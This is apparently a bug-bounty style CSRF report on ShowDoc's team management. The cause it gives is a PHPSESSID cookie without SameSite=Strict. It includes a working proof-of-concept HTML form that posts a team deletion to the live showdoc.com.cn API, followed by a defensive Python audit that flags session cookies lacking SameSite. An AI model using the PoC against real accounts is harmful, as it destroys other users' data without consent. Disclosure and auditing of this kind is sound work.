You set the Strict flag only on one of your cookies, cookie_token, but in Team management an attacker can still delete or add teams through a CSRF vulnerability, because the cookie named PHPSESSID does not have the Strict flag.
1. Replace 38046 with the team id.
2. Open poc.html and click the submit button.
3. After that, the team with id 38046 (or the team id you substituted) will be deleted.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
<input type="hidden" name="id" value="38046" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
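As an added defender-side check, not part of this report or of ShowDoc's own code: a small Python audit that parses Set-Cookie headers and reports which session cookies a cross-site POST like the form above would still carry. It assumes the report's "Strict flag" means the cookie's SameSite=Strict attribute; the two header lines are constructed to match the report's description and use placeholder values.

```python
# Set-Cookie headers constructed to match the report: cookie_token carries
# SameSite=Strict, PHPSESSID carries no SameSite attribute at all.
# Values are placeholders, not real tokens or session ids.
SAMPLE_SET_COOKIE_HEADERS = [
    "cookie_token=PLACEHOLDER_TOKEN; Path=/; HttpOnly; Secure; SameSite=Strict",
    "PHPSESSID=PLACEHOLDER_SESSION; Path=/; HttpOnly",
]

# Cookies that authenticate the user. Any of these without an explicit
# SameSite attribute is sent along with a cross-site form POST.
SESSION_COOKIE_NAMES = {"PHPSESSID", "cookie_token"}


def parse_set_cookie(header: str) -> tuple[str, dict[str, str]]:
    """Return (cookie_name, {attribute_lower: value}) for one Set-Cookie header."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs


def csrf_exposed_cookies(headers: list[str], require_strict: bool = True) -> list[str]:
    """Names of session cookies that a cross-site POST would still carry.

    With require_strict=True only SameSite=Strict passes; with False,
    SameSite=Lax also passes (Lax blocks cross-site POST but not top-level
    GET navigations). A missing attribute is always flagged: browser
    defaults differ, so an explicit attribute is the only reliable setting.
    """
    accepted = {"strict"} if require_strict else {"strict", "lax"}
    exposed = []
    for header in headers:
        name, attrs = parse_set_cookie(header)
        if name not in SESSION_COOKIE_NAMES:
            continue
        if attrs.get("samesite", "").lower() not in accepted:
            exposed.append(name)
    return exposed


if __name__ == "__main__":
    # Only PHPSESSID is reported, which is exactly the gap the PoC relies on.
    print(csrf_exposed_cookies(SAMPLE_SET_COOKIE_HEADERS))  # ['PHPSESSID']
```

Run the same audit against the Set-Cookie headers of a real login response to confirm every session cookie, not just cookie_token, carries SameSite=Strict.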